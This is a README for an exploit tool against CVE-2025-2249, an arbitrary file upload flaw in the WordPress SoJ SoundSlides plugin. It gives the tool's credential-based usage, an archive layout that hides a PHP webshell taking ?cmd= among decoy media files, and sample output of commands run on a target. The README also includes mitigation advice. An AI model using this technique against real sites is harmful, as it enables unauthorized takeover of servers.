
# 🔐 WordPress SoJ SoundSlides Plugin <= 1.2.2 - Authenticated Arbitrary File Upload

> ⚠️ **DISCLAIMER:** This exploit is for educational and authorized testing purposes only.

---

## 📌 Vulnerability Summary

- **Plugin:** SoJ SoundSlides  
- **Affected Versions:** <= 1.2.2  
- **Type:** Authenticated (Contributor+) Arbitrary File Upload  
- **Patch Status:** ❌ No official fix available

The SoJ SoundSlides plugin allows authenticated users with **Contributor or higher** roles to upload arbitrary ZIP files. Due to missing validation, attackers can upload PHP webshells that are extracted and executed from a web-accessible directory.

---

## 💥 Impact

An attacker with valid WordPress credentials can:

- 📦 Upload a ZIP archive containing a PHP shell
- 🖥️ Execute system commands remotely (`?cmd=`)
- 🔓 Gain unauthorized control of the site/server

---

## 🛠️ Usage

```bash
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

| Argument  | Description                    |
|-----------|--------------------------------|
| `-u`      | WordPress base URL             |
| `-un`     | WordPress username             |
| `-p`      | WordPress password             |

---

## ✨ Features

- 🔍 Version check from plugin `readme.txt`
- 🧰 Auto-generates ZIP with required structure and webshell
- 📤 Exploits vulnerable upload endpoint
- 💻 Interactive command execution via uploaded shell

---

## 📂 ZIP File Structure

```
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)
```

---

## 🧪 Example

```bash
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
```


---

## 🛡️ Mitigation

- ❌ Disable or remove the plugin
- 🧱 Apply upload restrictions
- 🔍 Monitor `wp-content/uploads/` for unexpected `.php` files



> Built with ❤️ by [Nxploited | Khaled ALenazi]  
> For education, awareness, and defense.

---

## 🧠 Final Note

Security is everyone's responsibility. Always test ethically, report responsibly, and protect the web.

